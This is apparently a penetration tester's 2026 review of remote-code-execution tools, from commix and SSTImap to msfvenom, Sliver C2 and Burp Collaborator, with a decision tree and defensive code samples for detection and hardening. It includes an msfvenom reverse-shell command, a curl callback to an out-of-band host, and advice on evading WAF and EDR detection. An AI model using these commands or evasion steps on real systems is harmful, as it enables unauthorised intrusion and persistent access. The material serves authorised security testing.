A tools listicle is only useful if the author actually uses the tools. This is the short list of remote code execution tools I have spent real engagement hours with in 2026, across the broad RCE family: OS command injection, server side template injection, eval injection, and the post-exploit layer that comes after a working primitive.
If you want the underlying mechanics first, the RCE deep dive covers the variants and the web application security vulnerabilities taxonomy covers where RCE sits in the broader map. This article is for the choice of which tool to run once you have a candidate sink.
The decision matrix
| Tool | Licence | Language | Maintained | Best for | Interface | Stars (May 2026) |
|---|---|---|---|---|---|---|
| commix | GPLv3 | Python | Active | OS command injection automation; the sqlmap of shell injection | CLI | 5k+ |
| SSTImap | GPLv3 | Python | Active | SSTI exploitation across Jinja2, Twig, Mako, Smarty, ERB, Velocity | CLI | 1k+ |
| tplmap | GPLv3 | Python | Lightly maintained | Historical SSTI tool; SSTImap is the active fork | CLI | 4k+ |
| msfvenom / Metasploit | BSD | Ruby | Active | Payload generation, listener handling, post-exploitation modules | CLI + msfconsole | 38k+ |
| Sliver | GPLv3 | Go | Active | Modern C2 framework; the open-source Cobalt Strike replacement | CLI server + implants | 11k+ |
| Burp Suite + Collaborator | Commercial | Java | Active | Manual workflow, out-of-band detection for blind RCE | GUI + CLI | n/a |
| PayloadsAllTheThings | MIT | Markdown | Active | The canonical payload lookup for every injection family | Static site | 78k+ |
A quick read of the table: commix is the default for shell-out injection. SSTImap is the default for template injection. Metasploit and Sliver handle the post-primitive stage. Burp Collaborator is how you confirm the blind cases. PayloadsAllTheThings is the reference everyone keeps open in a second tab.
1. commix
Repo: github.com/commixproject/commix
The default for OS command injection. The sqlmap-equivalent for shell-out sinks.
commix (Command Injection Exploiter) automates detection and exploitation of OS command injection the way sqlmap automates SQLi. It covers results-based injection, blind time-based injection, file-based out-of-band detection, and ships with a working pseudo-shell once the injection lands. It speaks every injection vector that matters: GET/POST parameters, cookies, HTTP headers (including User-Agent and Referer), JSON bodies, and multipart forms.
What I like:
- The `-r request.txt` flow with Burp is identical to sqlmap. Capture, save, point commix at the file. Muscle memory transfers.
- Pseudo-shell mode (`--os-shell`) gives you an interactive prompt over the injection without writing your own loop. Works on Linux and Windows targets.
- Tamper scripts cover the common evasions (space-to-IFS, comment injection, base64-encoded payloads). Writing your own is a short Python file.
- Honest about blind vs results-based. The output tells you which technique landed, not just "vulnerable".
What I do not like:
- Default User-Agent is `commix/x.y.z`. Like sqlmap, every WAF has this signatured. `--random-agent` first, always.
- Detection is noisy by default. On a real target with monitoring you want `--technique=T` (time-based only) plus `--delay` to slow the probe rate.
- Output is verbose. `-v 1` is usable, `-v 3` is debugging.
- Coverage of argument injection (a close cousin) is thin. For argument injection you are usually crafting by hand.
When to use it. Any time a parameter looks like it ends up in `system()`, `exec()`, `popen()`, `subprocess.Popen(shell=True)`, or a backtick. Start with commix. If it finds nothing in a reasonable scan and you still suspect injection, move to manual Burp Repeater with the PayloadsAllTheThings command-injection list.
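The sink shapes named above, as an added example that is not from the article or from commix: the string-concatenation form a shell will parse, beside the argv form that keeps the shell out of the picture. `HOSTNAME_RE` is a hypothetical allowlist, the tainted input is constructed, and `echo` stands in for the real binary so nothing is actually pinged.

```python
import re
import shlex
import subprocess

# Hypothetical allowlist for a hostname-style parameter; tighten it for the real application.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")

def shell_out_vulnerable(host):
    """The shape commix targets: the value is spliced into a string a shell will parse.
    Returned, never executed here; under shell=True / system(), ';', '|', '`' and
    '$(...)' inside host are honoured as shell syntax, not as part of the hostname."""
    return f"ping -c 1 {host}"

def shell_out_quoted(host):
    """If a shell is unavoidable, shlex.quote turns the whole value into one shell word."""
    return f"ping -c 1 {shlex.quote(host)}"

def argv_hardened(host):
    """Preferred fix: validate against the allowlist, then pass the value as a single
    argv element so no shell is involved at all."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]

def echo_last_arg(argv):
    """Demonstrates the argv property harmlessly: echo prints the last element literally,
    metacharacters included, because the process receives it as one argument."""
    completed = subprocess.run(["echo", argv[-1]], capture_output=True, text=True, check=True)
    return completed.stdout.rstrip("\n")

if __name__ == "__main__":
    tainted = "10.0.0.1;id"   # constructed injection-shaped input
    print(shell_out_vulnerable(tainted))   # a shell would treat ';id' as a second command
    print(shell_out_quoted(tainted))       # ping -c 1 '10.0.0.1;id'
    print(echo_last_arg(["ping", "-c", "1", tainted]))  # 10.0.0.1;id
    try:
        argv_hardened(tainted)
    except ValueError as exc:
        print(exc)
```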
2. SSTImap
Repo: github.com/vladko312/SSTImap
The default for server side template injection in 2026.
SSTImap is the actively maintained fork of tplmap, picked up by vladko312 after epinna's original went dormant. It automates detection and exploitation across the template engines that show up in real applications: Jinja2 (Python/Flask), Mako, Tornado, Twig (PHP), Smarty, Freemarker (Java), Velocity, ERB (Ruby), Pug, and a handful of others. For each engine it tries the engine-specific escape sequences, confirms the sink, then offers code-execution and file-read primitives where the engine permits.
What I like:
- Engine coverage is the broadest of any maintained SSTI tool. The detection ladder tries each engine's canonical probe (`{{7*7}}` for the Jinja family, `${7*7}` for Freemarker/Velocity, `<%= 7*7 %>` for ERB) and moves on cleanly.
- Once an engine is confirmed, the exploitation path knows which sandbox-escape primitives apply. For Jinja2 it walks the `__class__.__mro__` chain; for Twig it reaches for `_self.env.registerUndefinedFilterCallback`; for Freemarker it tries the `freemarker.template.utility.Execute` import.
- `-r request.txt` workflow with Burp, same as sqlmap and commix.
- The fork has had meaningful releases through 2025 and 2026. Issues get triaged.
What I do not like:
- Smaller community than commix or sqlmap. Fewer eyes on weird engines.
- Some of the engine probes are still pattern-matched against response text; a target that renders `49` for any reason produces a false positive. Verify by changing the multiplication.
- The line between SSTI and eval injection blurs once you reach for the engine's "execute arbitrary code" feature. Read what the tool is actually doing before you run it against production.
When to use it. Any parameter that ends up rendered through a template engine. Forms that echo back your input, error pages that interpolate query parameters, email-template previews, server-rendered admin dashboards. Start with the `{{7*7}}` / `${7*7}` probe in Burp Repeater; if you get `49`, point SSTImap at the request.
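The footprints described in sections 1 and 2 (commix's default `commix/x.y.z` User-Agent, the `{{7*7}}` / `${7*7}` / `<%= 7*7 %>` arithmetic probes, shell separators in a parameter) turned into detection logic over access logs, as an added example that is not part of the original article. The log lines are constructed, the layout assumes the combined access-log format, and the last line shows that a bare `49` on its own is not evidence of anything.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not taken from any real host.
# The User-Agent "commix/x.y.z" is the placeholder version string used in the text above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2026:10:01:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [12/May/2026:10:01:09 +0000] "GET /ping?host=10.0.0.1 HTTP/1.1" 200 88 "-" "commix/x.y.z"
10.0.0.7 - - [12/May/2026:10:01:10 +0000] "GET /ping?host=10.0.0.1%3Bid HTTP/1.1" 200 120 "-" "commix/x.y.z"
10.0.0.9 - - [12/May/2026:10:02:31 +0000] "GET /preview?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2026:10:02:35 +0000] "GET /preview?name=%24%7B7*7%7D HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2026:10:02:40 +0000] "GET /preview?name=%3C%25%3D%207*7%20%25%3E HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.11 - - [12/May/2026:10:03:00 +0000] "GET /report?id=49 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
# First-step probes the tools send: {{7*7}} (Jinja family), ${7*7} (Freemarker/Velocity), <%= 7*7 %> (ERB).
SSTI_PROBE_RE = re.compile(r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}|\$\{\s*\d+\s*\*\s*\d+\s*\}|<%=\s*\d+\s*\*\s*\d+\s*%>")
# Shell separators and substitutions that have no business inside a hostname-style parameter.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|\$\{IFS\}")
TOOL_UA_PREFIXES = ("commix/", "sqlmap/")

def scan_access_log(text):
    """Return one finding per (line, reason) for requests that look like injection probes."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status, ua = m.groups()
        query = unquote(path.partition("?")[2])  # decode once: the tools URL-encode their payloads
        if ua.startswith(TOOL_UA_PREFIXES):
            findings.append({"line": lineno, "client": client, "reason": "default tool User-Agent", "ua": ua})
        if SSTI_PROBE_RE.search(query):
            findings.append({"line": lineno, "client": client, "reason": "SSTI arithmetic probe", "query": query})
        if SHELL_META_RE.search(query):
            findings.append({"line": lineno, "client": client, "reason": "shell metacharacter in parameter", "query": query})
    return findings

def clients_to_review(findings, min_hits=2):
    """Clients with at least min_hits findings: one odd request is noise, a sequence is a scan."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return sorted(c for c, n in counts.items() if n >= min_hits)

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
    print("review:", clients_to_review(scan_access_log(SAMPLE_LOG)))
```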
3. tplmap (the predecessor)
Repo: github.com/epinna/tplmap
The original SSTI automation tool. Use SSTImap instead in 2026.
tplmap is epinna's original SSTI tool, the inspiration for SSTImap. It still works for the engines it shipped with, but maintenance has been light for years. The Python 2/3 transition left rough edges, and several engine probes are now stale against current versions of Jinja2 and Twig that have tightened their sandboxes.
I include it here because the name still comes up in older write-ups and engagement reports, and because the SSTImap fork ports cleanly from any tplmap muscle memory. If you have an existing tplmap workflow, switch to SSTImap; the flags are nearly identical and the fork actively gets new engines.
When to use it. Only if you are reproducing a finding from an older report against an engine SSTImap has dropped. Otherwise default to SSTImap.
4. msfvenom + Metasploit Framework
Docs: docs.metasploit.com
The payload-generation and post-exploitation backbone. Still essential in 2026.
msfvenom generates payloads in every flavour an engagement asks for: staged and stageless reverse shells, bind shells, executable formats (PE, ELF, Mach-O), web shells (PHP, JSP, ASP, ASPX), shellcode for raw use, and DLL/SO sideload payloads. The wider Metasploit Framework wraps these with a listener (exploit/multi/handler), post-modules for credential dumping and lateral movement, and a working session manager (Meterpreter for the rich case, plain reverse shells for the minimal case).
What I like:
- `msfvenom` alone is worth installing the framework for. Generating a working PHP reverse shell, a Windows reverse-TCP exe, or a Linux ELF stager is a single command each.
- Encoders and bad-character handling (`-b "\x00\x0a"`) save real time when the injection sink mangles certain bytes.
- The post-exploitation module library is enormous and well-tested. Privilege escalation enumeration, hashdump, Kerberos extraction, persistence; all there.
- Free, open source, BSD-licensed. No procurement conversation.
What I do not like:
- Default payloads are heavily signatured by every endpoint product. Defender, CrowdStrike, SentinelOne all flag stock msfvenom shellcode on sight. You will need to encode, encrypt, or replace the loader for anything serious.
- Meterpreter is loud on the network. Modern EDR sees the staging traffic instantly. For real engagements, use it for the initial foothold and then switch to a quieter C2.
- The framework install footprint is large. On a minimal attacker VM, `msfvenom` alone (via the standalone install) is often enough.
When to use it. Generating payloads for any RCE primitive: `msfvenom -p php/reverse_php LHOST=... LPORT=... -f raw` produces a one-liner you drop into the commix `--os-shell` prompt. The full framework when you need the post-exploitation library or quick listener setup. For sustained access on a real engagement, hand off to Sliver.
5. Sliver
Repo: github.com/BishopFox/sliver
The open-source Cobalt Strike replacement. The C2 framework I reach for in 2026.
Sliver is Bishop Fox's open-source command-and-control framework. Written in Go, cross-compiled to Windows, Linux, and macOS implants, with mTLS, WireGuard, HTTP(S), and DNS transport options out of the box. The server runs on a Linux box you control, operators connect over a TLS client, and implants beacon back over whichever transport you configured at generation time.
What I like:
- Compiles unique implants per operation. Static signatures from one engagement do not carry to the next.
- WireGuard transport is excellent for stealth; the traffic looks like generic UDP and there is no TLS handshake to fingerprint.
- Multi-operator support out of the box. Two operators can drive the same server, see each other's sessions, hand off implants.
- Active development, healthy issue tracker, real maintainership at Bishop Fox.
- Free. No per-seat commercial licence to expense (Cobalt Strike's pricing is only published behind a Fortra quote, but it is a real procurement line item; Sliver is not).
What I do not like:
- Smaller post-exploitation library than Cobalt Strike's BOFs ecosystem. You will be writing some primitives yourself.
- Documentation has caught up but still trails Metasploit's. Reading the source is occasionally faster than reading the docs.
- The DNS transport is functional but noisy on volume-based detection. Use it for the canary, not for bulk data movement.
When to use it. Any engagement past the initial foothold where you need durable C2. The msfvenom payload gets you onto the host; the Sliver implant keeps you there. For everything Cobalt Strike used to do in 2018-2022, Sliver is the answer now.
6. Burp Suite + Collaborator
Site: portswigger.net/burp

Not an RCE tool; the platform every web RCE workflow runs on. Collaborator is how you find blind RCE.
Burp's role in RCE work is the same as in SQLi work: intercepting proxy, request manipulator, manual workflow. The Collaborator addition is the critical piece for RCE specifically. Blind RCE (no command output, no error, just a sink that runs your input) is invisible without an out-of-band channel. Collaborator gives you a unique subdomain you can curl, nslookup, or wget from the target; any hit back to that subdomain is proof the injection executed.
What I like:
- Repeater for hand-crafted payload tweaking. When commix or SSTImap is wrong and the manual approach is right, you live here.
- Collaborator is the only reliable OOB listener for most engagements. The free `interactsh` works for many cases but Collaborator is more robust against DNS-filtering targets.
- Intruder (Pro) for fuzzing parameters with the PayloadsAllTheThings command-injection list.
What I do not like:
- Pro licence is around 500 USD per user per year. Worth it; the Collaborator alone justifies it for any serious web work.
- Community edition's Repeater is sufficient but the rate-limited Intruder is not usable for real fuzzing.
- The CLI exists but is awkward. For scripted RCE confirmation, `interactsh` plus a curl loop is often faster.
When to use it. Always running in the background. Capture requests there, export to commix or SSTImap. Use Collaborator to confirm blind RCE before claiming a finding.
7. PayloadsAllTheThings
Site: swisskyrepo.github.io/PayloadsAllTheThings
Not a tool; the reference. The second tab every operator has open during a web engagement.
swisskyrepo's PayloadsAllTheThings is a curated, MIT-licensed repository of attack payloads, bypasses, and reference notes for every web injection family. The Command Injection and Server Side Template Injection sections are the canonical lookups when commix or SSTImap is silent and you need to hand-craft. The repo is updated regularly, accepts community contributions, and is structured per-vulnerability so cross-reference is fast.
What I like:
- One canonical source. No more grepping through five blog posts for the right Jinja2 sandbox escape.
- Engine-specific SSTI sections cover sandbox escapes that SSTImap may not try by default.
- Command injection section covers the unusual cases: Windows `cmd.exe` quoting, restricted shells, `${IFS}` workarounds.
What I do not like:
- It is a reference, not a tool. You still need to deliver the payloads through Burp or curl.
- Quality varies between sections; the heavily-trafficked ones (SQLi, XSS, SSTI, Command Injection) are excellent, the long-tail ones are uneven.
When to use it. Keep it open during every engagement. When commix or SSTImap stops finding things, the right next payload is almost always already in there.
What I do not recommend
Cobalt Strike (in 2026)
I have used Cobalt Strike on real engagements and it remains technically excellent. The reasons to drop it in 2026 are practical, not technical: Fortra's licensing is a real procurement line item (pricing is quote-only and gated behind a vetting process), the open-source alternatives have closed most of the capability gap, and the leaked-binary situation has poisoned the well for any organisation that does not want CS traffic patterns on their network. Sliver gives me 90% of what I used Cobalt Strike for, with no procurement conversation and unique-per-engagement implants. If you are starting an engagement in 2026 and not already paying for Cobalt Strike, start with Sliver.
"RCE scanner" wrappers
Several commercial scanners advertise "RCE detection" as a feature. In practice they wrap a payload list against a parameter sweeper and report anything that looks like it executed. The false-positive rate is high, the false-negative rate on anything blind or template-based is higher, and you cannot tune the underlying detection. If you want commix, run commix; if you want SSTImap, run SSTImap; the wrapper is dead weight in between.
pentestmonkey reverse-shell cheat sheet as a standalone tool
The cheat sheet is fine and I still link to it occasionally, but PayloadsAllTheThings has absorbed its content with better maintenance. Use PayloadsAllTheThings; the pentestmonkey page is essentially frozen.
Tools I dropped from this year's list
- Empire (PowerShell Empire). The 2.x maintenance ended; BC-Security's 5.x fork is alive but the Windows-only PowerShell focus is too narrow for cross-platform engagements. Sliver covers the same ground with broader transport options.
- Pupy. Cross-platform Python C2 framework, conceptually similar to Sliver. Maintenance has been light, the Python footprint on target hosts is loud, and the project has not kept pace.
- Veil-Evasion. Payload obfuscation framework. Effectively unmaintained; msfvenom plus a modern loader does the same job with less ceremony.
- Cobalt Strike (see above). Still on shelves at organisations that already paid, but not what I recommend for new engagements.
Which tool should I use? (Decision tree)
A short flow for the common cases:
- Is the sink a `system()` / `exec()` / shell-out call with user-controlled input?
  - Yes. commix first. If it finds nothing in a reasonable scan and you still suspect injection, manual Burp Repeater with PayloadsAllTheThings.
- Does the parameter end up rendered through a template engine (Jinja2, Twig, Freemarker, ERB, Smarty, etc.)?
  - Yes. Test with `{{7*7}}` / `${7*7}` / `<%= 7*7 %>` in Burp Repeater. If you get `49`, point SSTImap at the request.
- Is the sink an `eval()` / `Function()` / `exec()` call against a server-side language string?
  - Yes. This is eval injection, not OS command or template injection. No good automation tool covers this well; craft by hand from PayloadsAllTheThings, confirm via Collaborator.
- No visible response and you suspect blind RCE?
  - Yes. Burp Collaborator (or `interactsh`). Inject a DNS-resolving primitive (`curl http://uniqueid.collaborator.net`) and wait for the hit.
- You have a working primitive and need a payload?
  - `msfvenom` for the payload, `exploit/multi/handler` for a one-off listener, Sliver for sustained C2.
- You need durable, multi-host C2 across a network?
  - Sliver. Generate unique implants per host, use WireGuard transport, drop the msfvenom stager once the implant lands.
A note on the year stamp
I will refresh this list every twelve months. The slug stays stable (best-rce-tools-2026 is a redirect target you can rely on; future years update the H1 and title). Tools added, dropped, and re-ranked here will appear in the next refresh with a short changelog at the top.
Where to go next
- Remote code execution: variants, exploitation, and defence for the underlying mechanics
- OS command injection for the shell-out family
- Argument injection for the close cousin commix does not cover well
- Server side template injection for the template-engine family
- Eval injection for the language-eval family
- Web application security vulnerabilities taxonomy for the broader map
Sources
Authoritative references this article was fact-checked against.
- commix, official repository (github.com)
- SSTImap, official repository (github.com)
- Sliver, official repository, Bishop Fox (github.com)
- Metasploit Framework, official documentation (docs.metasploit.com)
- PayloadsAllTheThings, canonical payload reference (swisskyrepo.github.io)